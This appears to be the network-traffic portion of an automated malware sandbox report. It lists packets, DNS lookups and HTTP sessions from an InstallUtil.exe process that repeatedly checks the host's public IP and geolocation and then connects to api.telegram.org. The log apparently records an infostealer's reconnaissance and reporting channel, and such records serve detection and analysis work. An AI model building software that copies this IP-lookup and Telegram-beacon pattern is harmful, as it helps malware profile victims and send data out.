                                                                                                            Jan 11, 2025 06:50:28.498608112 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:28.927508116 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:28.929816008 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:28.929855108 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.069497108 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.069578886 CET44349989104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.069638014 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:29.075918913 CET49989443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:29.080271959 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.081559896 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.085367918 CET8049988158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.085450888 CET4998880192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.086467981 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:29.086549044 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.086675882 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:29.091489077 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.883913994 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.885641098 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:31.885689020 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.885755062 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:31.886112928 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:31.886123896 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:31.936036110 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:32.362181902 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.364933968 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:32.364979982 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.505136967 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.505235910 CET44349991104.21.64.1192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.505321980 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:32.506017923 CET49991443192.168.2.7104.21.64.1
                                                                                                            Jan 11, 2025 06:50:32.566646099 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:32.571713924 CET8049990158.101.44.242192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.571780920 CET4999080192.168.2.7158.101.44.242
                                                                                                            Jan 11, 2025 06:50:32.574101925 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:32.574167967 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:32.574245930 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:32.574925900 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:32.574953079 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.183535099 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.183743000 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.185882092 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.185916901 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.186228991 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.187875032 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.231343031 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.465497971 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.465578079 CET44349992149.154.167.220192.168.2.7
                                                                                                            Jan 11, 2025 06:50:33.465704918 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:33.471218109 CET49992443192.168.2.7149.154.167.220
                                                                                                            Jan 11, 2025 06:50:48.394500017 CET4998080192.168.2.7158.101.44.242
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:49:54.168699026 CET | 54649 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 06:49:54.175420046 CET | 53 | 54649 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 06:49:54.987406969 CET | 51260 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 06:49:54.994415998 CET | 53 | 51260 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 06:50:32.566524982 CET | 61463 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 06:50:32.573194027 CET | 53 | 61463 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 06:49:54.168699026 CET | 192.168.2.7 | 1.1.1.1 | 0xf285 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.987406969 CET | 192.168.2.7 | 1.1.1.1 | 0xd06 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:50:32.566524982 CET | 192.168.2.7 | 1.1.1.1 | 0xd68 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 06:49:54.175420046 CET | 1.1.1.1 | 192.168.2.7 | 0xf285 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:49:54.175420046 CET | 1.1.1.1 | 192.168.2.7 | 0xf285 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.175420046 CET | 1.1.1.1 | 192.168.2.7 | 0xf285 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.175420046 CET | 1.1.1.1 | 192.168.2.7 | 0xf285 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.175420046 CET | 1.1.1.1 | 192.168.2.7 | 0xf285 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.175420046 CET | 1.1.1.1 | 192.168.2.7 | 0xf285 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:49:54.994415998 CET | 1.1.1.1 | 192.168.2.7 | 0xd06 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:50:32.573194027 CET | 1.1.1.1 | 192.168.2.7 | 0xd68 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49974 | 158.101.44.242 | 80 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:54.205626011 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 11, 2025 06:49:54.782908916 CET | 321 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:54 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1d4e51e60585519d139b4a8b7878b71c
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:49:54.787698984 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 06:49:54.945127010 CET | 321 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:54 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 680c31a1cf62f71f0bcd631035c88d60
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:49:55.891335011 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 06:49:56.049045086 CET | 321 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:55 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1c43368d0a89c5eb88b92b32a0d123c3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49978 | 158.101.44.242 | 80 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:49:56.710499048 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 06:49:57.322055101 CET | 321 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:57 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 865c7354a835e387f1a9e454995e2c6e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49980 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jan 11, 2025 06:49:57.929539919 CET | Bytes transferred: 127 | Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Timestamp: Jan 11, 2025 06:49:58.510333061 CET | Bytes transferred: 321 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:58 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 91fffedae009b47884576ada5ab340fc
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49982 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jan 11, 2025 06:49:59.131913900 CET | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jan 11, 2025 06:49:59.696301937 CET | Bytes transferred: 321 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:59 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8645d7bd7aecdfbef775ce1dfb82588a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49984 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jan 11, 2025 06:50:00.351129055 CET | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jan 11, 2025 06:50:06.095999956 CET | Bytes transferred: 321 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:50:06 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b67f30b4a9cb58c86d7cc8a6efce460b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49986 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jan 11, 2025 06:50:06.712234974 CET | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jan 11, 2025 06:50:23.606889009 CET | Bytes transferred: 321 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:50:23 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7fcc4cbe496e502be43b66ce9c4eec7b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49988 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jan 11, 2025 06:50:24.367142916 CET | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jan 11, 2025 06:50:28.448599100 CET | Bytes transferred: 321 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:50:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1884ca47231fe82369f91d98a3ccf1ab
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49990 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: Jan 11, 2025 06:50:29.086675882 CET | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jan 11, 2025 06:50:31.883913994 CET | Bytes transferred: 321 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:50:31 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3c8aa0629279f68865fa3de560b3d1fb
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49975 | Destination IP: 104.21.64.1 | Destination Port: 443 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: 2025-01-11 05:49:55 UTC | Bytes transferred: 85 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-01-11 05:49:55 UTC | Bytes transferred: 851 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:55 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889384
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnbP0kOZmWRxWzr4Z5BxkZ1XtCKeuWb%2BDrYS9voP6nXhjL0xwHijeJigzXXKmVaGNDLkTM1YMVPBd1ZNWCnGAucyP9K0Q5Zu1BIHseeTE4YyPsVzm0enh1xGsv6G2O5PoXUIVC3M"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9002a057ee724414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1587&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1818181&cwnd=180&unsent_bytes=0&cid=4a22dab9fddc3a8f&ts=329&x=0"
Timestamp: 2025-01-11 05:49:55 UTC | Bytes transferred: 362 | Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49976 | Destination IP: 104.21.64.1 | Destination Port: 443 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: 2025-01-11 05:49:56 UTC | Bytes transferred: 61 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2025-01-11 05:49:56 UTC | Bytes transferred: 861 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:56 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889385
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciyTUXJKY1LpNE%2BUdzDQ1sl%2FLrjzQsba7z%2F1C2c5yEXr3KYz3EPadT5K9C0USE7e382aFCTKYdheiOwiezA3%2BHEnkZTFNrXemh%2F7ORzuxZu4W%2FdTfVUAUnwVvoxsWIbPR0kugQPv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9002a05cf8367c6a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1968&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1440552&cwnd=218&unsent_bytes=0&cid=6d2a4590bb251613&ts=161&x=0"
Timestamp: 2025-01-11 05:49:56 UTC | Bytes transferred: 362 | Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49979 | Destination IP: 104.21.64.1 | Destination Port: 443 | PID: 7612 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp: 2025-01-11 05:49:57 UTC | Bytes transferred: 85 | Direction: OUT
GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2025-01-11 05:49:57 UTC | Bytes transferred: 867 | Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 05:49:57 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1889387
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcFngWJXGCanFUphf%2FOJENTTq9Qnu%2B%2BfsxZgyk5Ze3uDvM0iCLb%2BM2FnvLZWy%2FG6%2Bwo6WM%2BCY9oitfoYCF8mZdjRw1ttldZt11gZK%2Bd2n5N5QZbgshu%2Fv9E4rqUXpKIttkHVvbCr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9002a064aa4ede95-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1606&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1780487&cwnd=243&unsent_bytes=0&cid=ee7e940648c9e794&ts=136&x=0"
Timestamp: 2025-01-11 05:49:57 UTC | Bytes transferred: 362 | Direction: IN
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             3 | 192.168.2.7 | 49981 | 104.21.64.1 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:49:58 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                             2025-01-11 05:49:59 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:49:59 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889388
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfFNuZaP%2BL4tCqXohBjL9crrFNIbBnXR4YYWXxWxX6cnrXh9AMgOvEGyQemchcdMf2DebI8fVtHbn3USL11vswq2YSp%2FtxebgzU%2BaTGv7z4qkXsyky9McYwgfa%2FqASxgGhgPGPmd"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9002a06c28b37c6a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2005&rtt_var=769&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1407228&cwnd=218&unsent_bytes=0&cid=4385d5c52d26c735&ts=159&x=0"
                                                                                                             2025-01-11 05:49:59 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             4 | 192.168.2.7 | 49983 | 104.21.64.1 | 443 | 7612 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             2025-01-11 05:50:00 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                             2025-01-11 05:50:00 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 05:50:00 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1889389
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
